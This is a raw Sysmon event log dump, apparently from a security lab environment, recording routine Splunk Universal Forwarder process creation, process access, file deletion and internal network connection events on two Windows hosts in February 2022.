Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.306{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F03C41F6DD9EFA34B3FF518DF295220,SHA256=7F67559C0AE1490FA6432FA0D71EE280BD49EF06D2E54A0BB08361790ABBE583,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1639-6216-E904-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1639-6216-E904-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.259{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1639-6216-E904-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.264{4F8D34B0-1639-6216-E904-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000220358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:46.677{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51577-false10.0.1.12-8000- 354300x8000000000000000220357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.881{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51576-false10.0.1.12-8089- 23542300x8000000000000000220389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:50.384{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72A9410C3C2C6ECAEB0BA4D7FE9A7540,SHA256=0130A1D71A45BEC7D00080E86C5AD13B8B8783A880D02B142A2E21528351BD3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:50.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E528E39FC8FF9FC889D6F83B09775C23,SHA256=44D6A9C7BF40CA3780899D6D6E2DE9291184A4B2DD8DF6E3277A8B94E54B8AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:50.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EBEE83D4F4C59B81D1C40973086F2C4,SHA256=2CF9AF172CE49EB36B6DCAF0EB2B8714592451D72E3924F83D12437294E8A6EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:47.729{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000220387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:50.024{4F8D34B0-1639-6216-EA04-000000003902}31602948C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:51.437{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963B3328E98388A31580E025C626D81A,SHA256=342725247286125E5BD5ECBB19149D5C0F215B4A9B46C954A59F7C51CD0EEE5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.540{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C2E682C4F1CC45B5F60B5A95A8844A,SHA256=B664FB0AF09D078064016CB93B5505E74F88F52773455996417BB2469BE4A080,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-163B-6216-EB04-000000003902}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 